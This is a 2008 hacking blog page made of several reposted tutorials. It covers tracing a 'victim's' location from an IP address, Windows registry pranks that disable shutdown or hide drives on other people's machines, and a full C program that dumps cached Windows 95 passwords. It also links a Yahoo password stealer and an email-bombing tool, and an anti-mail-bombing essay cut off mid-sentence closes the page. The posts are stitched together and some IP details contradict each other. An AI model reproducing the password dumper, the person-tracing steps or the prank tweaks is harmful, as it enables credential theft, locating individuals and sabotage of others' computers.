Friday, November 14, 2008

Getting geographical Information using an IP Address

______________________________________________________________________________
Getting geographical Information using an IP Address ______________________________________________________________________________
Getting the Internet Protocol or the IP Address of a remote system is said to the most important step in hacking of a
system. Sometimes, however we get an IP in order to get more information on someone or some host. But, how can
an IP Address be used to get more information on the location etc of a system? Well, this manual is aimed at
answering just this question.
Actually, the IP address (Actually the entire TCP/IP Protocol) is structured or designed such that one cannot tell as to
in which country a system having the given IP is situated, by simply looking at it. An IP Address has no fields, which
tell you the country in which the computer using it resides in. So, all myths like ‘The Second or the third field of an
IP stands for the country in which the system using it resides’ are definitely false and untrue.
However, yes sometimes one can guess or deduce as to in which country and even in which city the system using an
IP resides in, by simply looking at the first three fields of the IP. Let us take an example to understand what I mean to
say by this. Now, before I move on the example, let us understand how exactly IP Addresses are awarded to you.
Firstly, your ISP registers at the central authority and gets a particular range of IP addresses between which the
various customers (people who dial into their servers) can be awarded IP addresses. Most ISP’s are given a Class C
network Address. A class C Network address contains a 24-bit Network Prefix (the first three fields) and an 8-bit
Host number (the last field). It is referred to as "24's" and is commonly used by most ISP's.
******************
HACKING TRUTH: For the benefit of beginners, I have included below a snippet from one of my earlier manuals,
which explains IP Addresses better: (Even if you are not a newbie, I do suggest you read the below snippet, as it
might just be helpful.)
Like in the real world, everyone has got an individual Home Address or telephone number so that, that particular
individual can be contacted on that number or address, similarly all computers connected to the
Internet are given a unique Internet Protocol or IP address which can be used to contact that particular computer. In
geek language an IP address would be a decimal notation that divides the 32- bit Internet addresses (IP) into four 8-
bit fields.
Does the IP address give me some information or do the numbers stand for anything?
Let take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first
decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the
network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host
within the Network. This means that in the same Network, the network number is same. In order to provide
flexibility in the size of the Network, here are different classes of IP addresses:
Address Class Dotted Decimal Notation Ranges
Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx
Hacking Truths---What They Don't Teach in Manuals. Tracing an IP, getting...IP Address, nslookup, Reverse DNS, WHOIS, tracert, traceroute Ankit Fadia
The various classes will be clearer after reading the next few lines.
Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are
considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.
In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as
"16's".
A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as
"24's" and is commonly used by most ISP's.
Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables
were beginning to grow and now the administrators had to request another network number from the Internet before a
new network could be installed at their site. This is where sub-netting came in.
Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that
whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep
changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:
xxx.xxx.zzz.yyy
where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number.
So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain
the same and only the last part i.e. yyy is variable.
***********************
For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP,
whose first three fields are 203.98.12. Get it?
So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words,
all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect
would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.
This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which
ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the
country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is
done) the above method can be.
In my country, say there are three main ISP’s:
ISP Name Network Address Allotted
ISP I 203.94.47.xx
ISP II 202.92.12.xx
ISP III 203.91.35.xx
Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he
uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no.
You see, the above method of finding out the ISP of a person was successful only because we already had the ISP
Hacking Truths---What They Don't Teach in Manuals. Tracing an IP, getting...IP Address, nslookup, Reverse DNS, WHOIS, tracert, traceroute Ankit Fadia
and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a
lot of research and experimentation. And, I do think such research can be helpful sometimes.
Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living
in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world,
could you?
NOTE: In the above case, you also get to know the city of the system using the given IP, as most ISP’s use different
network addresses in different cities. Also, some ISP’s are operational in a single city.
So, is there a better method of getting the location of an IP? Yes, Reverse DNS lookups hold the key.
Just as DNS lookup converts the hostname into IP address, a Reverse DNS Lookup converts the IP address of a host
to the hostname. By hostname, what I mean to say is that it given us the name of the remote system in alphabets and
numbers and periods. For Example, mail2.bol.net.in would be a hostname, while 203.45.67.98 would not be a
hostname.
The popular and wonderful Unix utility ‘nslookup’ can be used for performing Reverse DNS lookups.
So, if you using a *nix box or if you have access to a shell account, then the first this to do is to locate where the
nslookup command is hidden by issuing the following command:
' whereis nslookup '.
Once you locate where the utility is hidden, you could easily use it to perform both normal and reverse DNS lookups.
As this is not a manual on using the ‘nslookup’ command, I will simply giving a basic relevant outline. In order to
get a more detailed description of how this works or how to use it, read the *nix man pages or the documentation.
We can use ‘nslookup’ to perform a reverse DNS lookup by mentioning the IP of the host at the prompt.
For Example,
$>nslookup IP Address
Note: The below IP’s and corresponding hostnames have been made up. They may not actually exist.
Let us say, that above, instead of IP Address, we type 203.94.12.01 (which would be the IP I want to trace.).
$>nslookup 203.94.12.01
Then, you would receive a response similar to: mail2.bol.net.in
Now, if you carefully look at the hostname that the Reverse DNS lookup, gave us, then the last part reveals the
country in which system resides in. You see, the ‘.in’ part signifies that the system is located in India. All countries
have been allotted country codes, which more often than not are the last part of the hostnames of the systems located
in that country. This method can also be used to figure out as to which country a person lives in, if you know his
email address. For Example, if a person has an email address ending in .ph then he probably lives in Philippines and
if it ends in .il then he lives in Israel and so on. Some common country codes are:
Country Code
Hacking Truths---What They Don't Teach in Manuals. Tracing an IP, getting...IP Address, nslookup, Reverse DNS, WHOIS, tracert, traceroute Ankit Fadia
Australia .au
Indonesia .id
India .in
Japan .jp
Israel .il
Britain .uk
For a complete list of country codes, visit:
http://www.alldomains.com/
http://www.iana.org/domain-names.html
*****************
General Extra Tip: To get the complete list of US State Abbreviation codes, visit:
http://www.usps.gov/ncsc/lookups/abbr_state.txt
****************
Windows users can perform Reverse DNS queries by downloading an utility called Samspade from: http://www.
samspade.com/
Another method of getting the exact geographical location of a system on the globe is by making use of the WHOIS
database. The WHOIS database is basically the main database, which contains a variety of information like contact
details, name etc on the person who owns a particular domain name. So, basically what one does in a WHOIS query,
is supply the WHOIS service with the hostname on which he wants more information. The WHOIS service then
replies with the information stored in its database.
This method can be used to get some pretty accurate information on a particular IP or hostname; however, it is
probably of no use if you are trying to point out the exact location of a dynamic IP. But, again this can be used to get
atleast the city in which the ISP used by the victim is situated.
You can carry out WHOIS queries at: http://www.alldomains.com/
You could also directly enter the following in the location bar of your Browser and perform a WHOIS enquiry.
Enter the following in the location bar of your browser:
http://205.177.25.9/cgi-bin/whois?abc.com
Note: Replace abc.com with the domain name on which you want to perform a WHOIS query.
This method cannot be used to get the contact address of a person, if the IP that you use to trace him, belongs to his
ISP. So, either you need to know the domain name (which is registered on his name) or have to remain satisfied
knowing only the city (and ISP) used by the person.
Say, the victim has registered a domain name and you want to use it to find out the city in which he resides. Now,
one thing to remember in this case is that, if the victim has registered the domain name using any of the various free .
com registration services like Namezero.com etc, then the domain name would probably be registered on the
Hacking Truths---What They Don't Teach in Manuals. Tracing an IP, getting...IP Address, nslookup, Reverse DNS, WHOIS, tracert, traceroute Ankit Fadia
company’s name and not the victim’s name. So, a WHOIS query will give information on the ISP and not the victim.
*****************
NEWBIE NOTE: The WHOIS service by default runs on Port 43 of a system. Try performing a WHOIS query by
telnetting to Port 43 and manually typing out the query. I have never tried it, however, it might be fun.
***************
Yet another and probably the second most efficient method (after Reverse DNS queries) of tracing an IP to its exact
geographical location, is to carry out a ‘traceroute’ on it. The ‘tracert’ or ‘traceroute’ commands give you the names
or IP’s of the routers through which it passes, before reaching the destination. Windows users can perform a trace of
an IP, by typing the following at the command line prompt:
C:\windows>tracert IP or Hostname
For more information about the usage and syntax of this command, type: ‘tracert’ at the command prompt.
Anyway, now let us see what is the result, when I do a tracert on my IP. Remember I live in New Delhi which is a
city in India. Watch the names of the hostnames closely, as you will find that they reveal the cities through which the
packet passes.
C:\windows>tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
So, the above shows us that the route taken by a data to reach the supplied IP is somewhat like this:
Netzero (ISP from which the data is sent) ---à Spectranet (A Backbone Provider) -----à New York ISP ---àNew
York Backbone -à Asia --à South Asia -à India Backbone --à New Delhi Backbone --à Another router in New
Delhi Backbone ---à New Delhi ISP.
So, basically this tracert does reveal my real location, which is: New Delhi, India, South Asia. Get it?
Sometimes, doing a ‘tracert’ on an IP, does not give useful information. You see in the above example, the
hostnames returned revealed the city or country in which the system is located. Although, more often than not, you
Hacking Truths---What They Don't Teach in Manuals. Tracing an IP, getting...IP Address, nslookup, Reverse DNS, WHOIS, tracert, traceroute Ankit Fadia
will get such helpful hostnames, sometimes the hostnames returned are very vague and unhelpful.
So what do you do then? Well, fret not. Simply do the below procedure.
Let us say that the trace ends at the hostname abc.com. This is very vague and gives absolutely no clue as to where
the system is located. However, what you could do is, launch your browser and visit: http://www.abc.com/ Now, abc.
com is probably an ISP and an ISP, will definitely give its location and the cities in which it operates. So, you could
still have a good chance of learning the definite city of the victim.
A very interesting utility is the VisualRoute utility, (http://www.visualroute.com/) which traces a hostname or IP and
shows the path taken by the packet to reach the destination on a world map. It is very useful and reveals some
excellent information. However, it sometimes does tend to be inaccurate.
**********************
HACKING TRUTH: Say you have found out the ISP of a person and simply want to learn as to in which country the
person resides in. However, visiting the ISP website doesn’t help. Nor does the hostname help. So, what do you do?
Well, one thing that you could do is, try connecting to Port 13 of the ISP. This is the port, which simply displays the
system time. It will tell you how many hours ahead or behind the system is from GMT time.
**********************
Well, this basically brings us to the end of this manual. Before I sign off, I would like to make it clear that it
extremely difficult and surprising if someone is able to get the exact contact address of a person by simply knowing
his IP. (Without taking help or breaking into the person’s ISP) Anyway, hope you liked this manual.



Continue reading →

Untold windows tricks and tips

Welcome to another Hacking Truths Manual. This time I have a collection of Tips and Tricks which no body normally knows, the secrets which Microsoft is afraid to tell the people, the information which you will seldom find all gathered up and arranged in a single file. To fully reap this Manual you need to have a basic understanding of the Windows Registry, as almost all the Tricks and Tips involve this file.

****************

Important Note: Before you read on, you need to keep one thing in mind. Whenever you make changes to the Windows Registry you need to Refresh it before the changes take place. Simply press F5 to refresh the registry and enable the changes. If this does not work Restart your system

****************

Exiting Windows the Cool and Quick Way

Normally it takes a hell lot of time just Shutting down Windows, you have to move your mouse to the Start Button, click on it, move it again over Shut Down, click, then move it over the necessary option and click, then move the cursor over the OK button and once again (you guessed it) click.This whole process can be shortened by creating shortcuts on the Desktop which will shut down Windows at the click of a button. Start by creating a new shortcut( right click and select New> Shortcut). Then in the command line box, type (without the quotes.)

'C:\windows\rundll.exe user.exe,exitwindowsexec'

This Shortcut on clicking will restart Windows immediately without any Warning. To create a Shortcut to Restarting Windows, type the following in the Command Line box:

'c:\windows\rundll.exe user.exe,exitwindows'

This Shortcut on clicking will shut down Windows immediately without any Warning.

Ban Shutdowns : A trick to Play on Lamers

This is a neat trick you can play on that lamer that has a huge ego, in this section I teach you, how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups. Launch regedit.exe and go to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.

Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:

This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.

You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoClose"="1"

Disabling Display of Drives in My Computer

This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. It's .reg file is as follows:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoDrives"=dword:03ffffff

Take Over the Screen Saver

*(Not Check) To activate and deactivate the screen saver whenever you want, goto the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Now add a new string value and name it Mouse Corners. Edit this new value to -Y-N. Press F5 to refresh the registry. Voila! Now you can activate your screensaver by simply placing the mouse cursor at the top right corner of the screen and if you take the mouse to the bottom left corner of the screen, the screensaver will deactivate.

Pop a banner each time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon

Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]

"LegalNoticeCaption"="Caption here."

Delete the Tips of the Day to save 5KB

Windows 95 had these tips of the day which appeared on a system running a newly installed Windows OS. These tips of the day are stored in the Windows Registry and consume 5K of space. For those of you who are really concerned about how much free space your hard disk has, I have the perfect trick.

To save 5K go to the following key in Regedit:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Tips

Now simply delete these tricks by selecting and pressing the DEL key.

Change the Default Locations

To change the default drive or path where Windows will look for it's installation files, go to the key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath

Now you can edit as you wish.

Secure your Desktop Icons and Settings

You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1. Refresh and restart for the settings to get saved.

CLSID Folders Explained

Don't you just hate those stubborn stupid icons that refuse to leave the desktop, like the Network Neighborhood icon. I am sure you want to know how you can delete them. You may say, that is really simple, simply right click on the concerned icon and select Delete. Well not exactly, you see when you right click on these special folders( see entire list below)neither the rename nor the delete option does not appear. To delete these folders, there are two methods, the first one is using the System Policy Editor(Poledit in the Windows installation CD)and the second is using the Registry.



Continue reading →

Windows Password File Torn apart

Windows Password Files Torn Apart By Ankit Fadia ankit@bol.net.in



____________________________________________________________________







All, Windows, users would probably be familiar with the infamous ‘pwl’ files or the files where the Windows login passwords are stored. Well, this manual is aimed at, simplifying how the authentication works when you type in your User name And password, what exactly .pwl files contain, where exactly they come into the picture and a whole lot of related things.







The *.pwl files are basically files in which the Windows Login Passwords are stored in. These files can be found in the \Windows directory by the name of the User, whose password it contains. For Example, if your Windows login Username is ankit, then the corresponding password would be stored in c:\windows\ankit.pwl Get it? These .pwl files are readable in any text editor like Notepad, but they are definitely not understandable. A typical example, of the contents of a .pwl file is as follows:







ã‚...-



ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ



ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ



ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR







p u.ÐX+�rÐq"±/2³ Êå¡hCJ‚D × `ÍY¥�!íx}(�qW¤ãƱ






This is definitely not something; a normal person can comprehend or make sense of.







Now, besides the Windows registry, Microsoft’s policy of security by obscurity can also be seen in the case of what .pwl files. Although the original usage of .pwl files was a standard to be used, by all applications, Microsoft simply does not officially provide any type of information on the standards of .pwl files.







To get a list of .pwl files in your system or in other words to find out which all passwords using the .pwl technology (What a good friend of mine likes to call them) are being stored on a particular system, then simply open c:\windows\system.ini in a plaintext editor like Notepad and look under the [Password Lists] section. A typical line from this section would be in the following format: USERNAME=Path_of_pwl_file







For Example,







[Password Lists]



ankit=c:\windows\ankit.pwl







This tells us that the .pwl containing the password for the Username ‘ankit’ is stored at: c:\windows\ankit.pwl







Anyway, the algorithm which is used in the case of storing information in the .pwl files (rather in the .pwl security option), refers to such files as databases, with each record consisting of three fields-:







Resource name



Resource password



Resource type (0..255)



Before, I move onto giving details about the above three fields, let us discuss, how exactly the User Authentication process takes place in Windows (In the case of the login password.)



NOTE: The below process is what happens in the case of the Windows login password.







When you first set a new account on Windows, it derives an encryption key from the specified password and creates c:\windows\username.pwl file, where username is the, well, quite obvious. One, thing to note here is that the .pwl file does not, I repeat does not store the login password, nor does it store the Username.(Although its name is same as the Username for whose authentication it is used.) What it stores, will become clearer once you read the below paragraph.







Now, the next time, you boot your system and type in your Username and password, then Windows,



decrypts the .pwl corresponding to the Username provided, using the decrypting key obtained from the password provided. Once, the .pwl file has been decrypted using the decryption key obtained from the provided password, Windows, verifies the checksum. If the checksum is correct or matches, then the user is authenticated else, try again. In the process of checksum verification, the username provided plays an important role.







Both the Username and Checksum are encrypted using a simple algorithm: RC4.







*****************************



HACKING TRUTH: Although, almost always, the name of the .pwl file is same as the Username, sometimes the name does differ. For Example, if, I use 2 to 3 different applications using .pwl security and then use the same username i.e. ankit in all of them to store passwords, then the naming of the .pwl files would be as follows:



The first .pwl would be named: ankit.pwl, the second would be named: ankit000.pwl , the third would be: ankit001.pwl and so on.



And, I am not too sure, but from what I gather, Windows never ever overwrites a .pwl file.



******************************







Coming, back to the fields. Both the resource name and resource password fields can be binary or simply encrypted and they are interchangeable by the application involved. The Resource Type field can have different numerical values depending upon the software involved. For Example, DUN, Dial Up Server and Windows Login, uses 6 as the value for the Resource Type field. While, Internet Explorer uses 19 as the value of the same field.







One thing to note about Windows Login password algorithms is that, the first time it was introduced, the algorithm was very very weak and allowed passwords to be easily decrypted. However, with each new release, the algorithms used have been improving. However, it still has not reached a reliable level.



In the algorithms used by various Operating Systems to encrypt their login passwords, the algorithm used by Windows is the worst. Some common defects are-:







The cipher algorithms involved are relatively lame. i.e. RC4 and MD5. They can easily be broken. Refer to: http://hackingtruths.box.sk\algorithms.htm for more info on various Encryption algorithms.

All passwords are converted to uppercase

Un-acceptably lame or weak method of storage.

Various Holes existing in the Password Caching Facility. The following Visual C++ program demonstrates further as to how this vulnerability can be exploited.





/*

(c) 1997, 98 Vitas Ramanchauskas



Use Visual C++ to compile this into win32 console app.

This code provided for educational purpose only.

!! NO WARRANTY, NO SUPPORT !!

*/

#include

#include



typedef struct tagPASSWORD_CACHE_ENTRY {

WORD cbEntry; // size of this entry, in bytes

WORD cbResource; // size of resource name, in bytes

WORD cbPassword; // size of password, in bytes

BYTE iEntry; // entry index

BYTE nType; // type of entry

BYTE abResource[1]; // start of resource name

// password immediately follows resource name

} PASSWORD_CACHE_ENTRY;



char *buf, *ob1;

int cnt = 0;



BOOL CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)

{

cnt++;

memmove(buf, x->abResource, x->cbResource);

buf[x->cbResource] = 0;

CharToOem(buf, ob1); // for non-English users

printf("%-30s : ", ob1);



memmove(buf, x->abResource+x->cbResource, x->cbPassword);

buf[x->cbPassword] = 0;

CharToOem(buf, ob1);

printf("%s\n", ob1);



return TRUE;

}



void main()

{

buf = new char[1024];

ob1 = new char[1024];

puts("There is no security in this crazy world!\n"

"Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas\n"

"************\n"

"!DISCLAIMER!\n"

"!This program intended to be used for legal purpose only!\n"

"************\n\n"

"This program shows cached passwords using standard (but undocumented)\n"

"Windows API on local machine for current user (user must be logged in).\n"

"You may invoke pwlview in this way: pwlview >> textfile.txt\n"

"to save passwords in file (don't forget to press enter twice)\n"

"Press Enter to begin...\n");

getchar();



HINSTANCE hi = LoadLibrary("mpr.dll");

if(!hi)

{

puts("Couldn't load mpr.dll. This program is for Windows 95 only");

return;

}

WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) =

(WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");

if(!enp)

{

puts("Couldn't import function. This program is for Windows 95 only");

return;

}

(*enp)(0,0, 0xff, pce, 0);

if(!cnt)

puts("No passwords found.\n"

"Probably password caching was not used or user is not logged in.");

FreeLibrary(hi);

puts("\nPress Enter to quit");

getchar();

}







Ankit Fadia



Ankit@bol.net.in







http://www.ankitfadia.com





To receive tutorials written by Ankit Fadia on everything you ever dreamt of in your Inbox, join his mailing list by sending a blank email to: programmingforhackers-subscribe@egroups.com







Wanna ask a question? Got a comment to make? Criticize, Comment and more…..by sending me an Instant Message on MSN Messenger. The ID that I use is: ankit_fadia@hotmail.com







Wanna learn Hacking? Wanna attend monthly lectures and discussions on various Networking/Hacking topics? Lectures, Debates and Discussions, get it all by simply joining The Hacking Truths club by clicking Here



Continue reading →

Friday, November 7, 2008

Yahoo Messenger Password Stealer


Yahoo Messenger Password Stealer






http://images34.fotosik.pl/235/8e4b531b28ec6212.gif



Continue reading →

[How-To]Bypassing Passwords in Windows

[How-To]Bypassing Passwords in Windows


This post is about an interesting hack to bypass the login passwords in Windows. Application of this hack will result in Windows logging you on everytime as a certain user ( Please do remember at this point that this trick is useful if you are the sole user of your computer. ) Follow the steps mentioned below to apply this trick

  • Click Start -> Run.
  • Type Control userpasswords2
  • Press Enter.

Bypassing login passwords in Windows

  • Click to uncheck the box labelled ‘ Users must enter a user name and password to use this computer’.
  • Press OK.

Hack for logging into windows bypassing the passwords.

  • Enter the username and password in the box that appears.
  • Click OK.

Interested readers can go ahead and also read out my previous posts on Spoofing, wherein i explained the simple process by which anyone can spoof a Yahoo User. Also, another antidote post which informs you how you can prevent yourself from getting phished or spoofed. Just in case if you have lost your wireless network key,here is a way to get your lost wireless network key. You can even learn the basics of hacking by using this free to use setup.

Continue reading →

Batch Script for removing Internet Explorer 7 from your PC

Batch Script for removing Internet Explorer 7 from your PC

This post will introduce you to a batch script which can be used to uninstall Internet Explorer 7 from your Computer. Follow the steps mentioned below to uninstall Internet Explorer 7 from your PC using a script file.

Internet Explorer 7 Logo

1.) Open your favorite editor like Textpad, Notepad, Notepadd++ etc.

2.) Copy the script code below and save the file as “TechnofriendsIE7RemovalScript.bat

REM **********************************************************************
REM Technofriends Script for Uninstalling Internet Explorer 7 from your PC
REM @Author:Vaibhav
REM @Date: 02-May-2008
REM **********************************************************************

@echo off
title InternetExplorer7 Uninstaller
color 0E
if exist %windir%\ie7\spuninst\spuninst.exe goto uninstall
if not exist %windir%\ie7\spuninst\spuninst.exe goto end

:uninstall
echo IE7 installation available….
echo Uninstalling IE7 from your PC…
echo Please wait, this may take several minutes depending on your computer.
%windir%\ie7\spuninst\spuninst.exe /quiet /norestart
echo IE7 has been uninstalled from your PC.
echo You need to reboot your computer to complete the uninstallation.
echo Internet Explorer will not function correctly unless you reboot.
echo Please save and close any open files!!!!
echo !! Any unsaved data will be lost !!
echo Press Enter to reboot your computer.
pause > nul
shutdown -r -t 15
exit

:end
echo IE7 not found.
echo Press Enter to exit from the setup.
pause > nul
exit

3.) Double click the file to uninstall Internet Explorer 7 from your Computer.

Continue reading →

Sunday, November 2, 2008

Download Email bombing software

emailbomber 1.0

Free Download
emailbomber 1.0mass mail certain E-mail to a given E-mail by using a SMTP server

Click to Download
Continue reading →

About Email Bombing

About E-mail "Bombing"



Mail-bombing is something that takes place on the Internet almost
every day. There are a variety of motivations behind mail-bombing.
Most mail-bombings result from a newsgroup posting that did not agree with
the mail-bomber's opinion. The definition of mail-bombing is independent
of the motivations behind it. Mail bombing is sending an excessive amount
of unwanted email to another party. This email is often times, but not
necessarily, the same message repeated over and over again. How much email
is "an excessive amount"? Whenever the receiving party decides it is an
excessive amount. If you are going to send many email messages to another
person, you should make sure that person doesn't mind receiving them.


If you are planning on mail-bombing somebody, there are many things of
which you should be aware. First of all, your Internet Service Provider
(ISP) will not appreciate you sending mail-bombs through their machine(s).
This is because most ISPs don't like abnormal activities taking place from
their machine(s) and/or don't want the increased load on *their* system.


If you are mail-bombing a particular person, you are also impacting
their ISP. If you fill up that computer with repetitive mail to the
person you are bombing, you are also preventing all the other users
on that system from receiving mail. If you fill up the hard drive of
a mail server, that machine may have to be taken down to have the
problem fixed -- interrupting service for all the users. Even if you
do not send enough email to fill up the system, you are still degrading
its performance for all users.


Now, sometimes mail-bombing is targeted at a specific machine and not a
specific user. Maybe this mail-bombing is designed to slow down or fill
up the destination machine. Maybe everything in the previous paragraph
is what the mail-bomber wants to happen. Unfortunately, whether the mail-
bombing is targeted at a system or a person, there are many other negative
consequences.


For many ISPs on the Internet, there are other companies that will accept
mail for them as a backup in case something happens to their system. These
are called mail-exchangers. For example, let's say that you send mail
to 'a@z.com'. If 'z.com' is unreachable or not currently operational,
that mail might be sent to 'y.com'. This would make 'y.com' a mail-exchanger
for 'z.com' -- 'y.com' has to be configured so that it will know to ultimately
give that email to 'z.com' as soon as it is reachable. This will many times
continue several levels on the Internet -- with maybe a 'x.com' that will
accept the mail if both 'y.com' and 'z.com' are down.


How does this affect a mail-bomber? Well, if a mail-bomber does successfully
crash or fill up the target machine, a mail-exchanger will accept the mail
instead. Often times, these mail-exchangers are run by the ISP's ISP (yes,
Internet Services Providers also need to have an ISP). Usually, this larger
ISP has exponentially more customers than the ISP that you targeted.
Although it may be totally unintentional, your mail could fill up and crash
this mail-exchanger. This will probably affect thousands of customers, as
opposed to the hundreds of customers usually affected by filling up a small
ISP. This can continue up the line until you could potentially crash a large
part of the Internet's mail servers.



The worst part is that every time one of the smaller ISPs delete the mail
and empty their hard drives and come back online, the higher mail-exchangers
will notice that the computer is available again. The mail-exchangers will
then send all the mail that it has been holding for the target computer,
possibly filling it up once more. This computer could actually be one of
the mail-exchangers caught in the middle of the big mail-exchangers and the
system you are mail-bombing.


There are very few people in the world that would want to affect any
systems besides the target of their mail-bombing. But, because of the
way the Internet is set up, this is impossible to prevent. This means
that mail-bombing is definitely *not* a solution to whatever problem
you may have with the target person or system.


So, what can you do instead of mail-bombing? Well, if the reason you want
to mail-bomb somebody is because they said something that irritated you
or did not fit with your beliefs, you may want to stop and act your age.
If somebody says something that irritates you, you can always just ignore
them. If you really want to, send *one* reply back to them pointing out
why they irritated you. Take care of the problem in a logical and civilized
way.


If you have a more legitimate reason for wanting to mail-bomb somebody,
there are alternatives. If it is a person that has done something to you,
you can report them to the proper authorities. If what this person did was
serious, but not illegal, you may want to report them to their ISP. If
what this person did was not serious enough to even report to their ISP,
then you should probably consider just talking it over with the individual.
If you do want to report a person to their ISP, there is one method that
will usually work. Let's say the person's email address is
'person@aabb.com'. In many cases, you can simply send email to
'root@aabb.com'. This will almost always get to the system administrator
for whatever system this person uses for their email. If this doesn't
work, follow the URL at the bottom of this document for more info.


If you have a problem with a system or that system's administrator, you
